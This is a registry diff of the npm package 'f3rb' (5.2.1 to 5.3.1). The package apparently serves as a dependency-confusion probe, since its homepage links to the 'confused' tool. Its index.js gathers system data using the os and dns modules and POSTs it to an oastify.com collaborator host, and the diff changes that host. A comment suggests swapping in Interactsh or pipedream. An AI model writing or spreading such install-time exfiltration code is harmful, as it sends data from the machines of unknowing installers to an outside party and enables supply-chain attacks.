f3rb 5.2.1 → 5.3.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/index.js +2 -1
  2. package/package.json +2 -2
  3. package/r.txt +7 -0
package/index.js CHANGED
@@ -1,3 +1,4 @@
1
+ kk
1
2
  const os = require("os");
2
3
  const dns = require("dns");
3
4
  const querystring = require("querystring");
@@ -22,7 +23,7 @@ var postData = querystring.stringify({
22
23
  });
23
24
 
24
25
  var options = {
25
- hostname: "http://i4n2xx9wzzwminyhx8uxna0q4ha8y0mp.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
26
+ hostname: "gyi0rv3utxqkclsfr6ovh8uoyf46s1gq.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
26
27
  port: 443,
27
28
  path: "/",
28
29
  method: "POST",
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "f3rb",
3
- "version": "5.2.1",
3
+ "version": "5.3.1",
4
4
  "description": "test",
5
5
  "main": "index.js",
6
6
  "scripts": {
@@ -17,6 +17,6 @@
17
17
  },
18
18
  "homepage": "https://github.com/visma-prodsec/confused#readme",
19
19
  "dependencies": {
20
- "f3rb": "^5.1.1"
20
+ "f3rb": "^5.2.1"
21
21
  }
22
22
  }
package/r.txt ADDED
@@ -0,0 +1,7 @@
1
+ jinja2<3.1.0
2
+ Flask==1.1.2
3
+ itsdangerous==2.0.1
4
+ # Flask_Caching==1.9.0
5
+ Werkzeug==1.0.1
6
+ flask_debugtoolbar==0.11.0
7
+ # flask_mail==0.9.1